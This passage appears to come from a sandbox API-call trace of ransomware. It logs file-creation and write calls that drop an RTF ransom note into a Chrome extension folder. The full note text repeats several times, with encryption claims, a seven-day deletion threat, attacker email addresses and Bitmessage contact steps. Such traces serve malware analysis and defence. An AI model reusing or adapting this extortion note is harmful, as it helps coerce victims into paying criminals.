BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0287.736] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.737] CloseHandle (hObject=0x2f0) returned 1 [0287.737] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0287.737] GetLastError () returned 0x2 [0287.737] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0288.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2374138, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 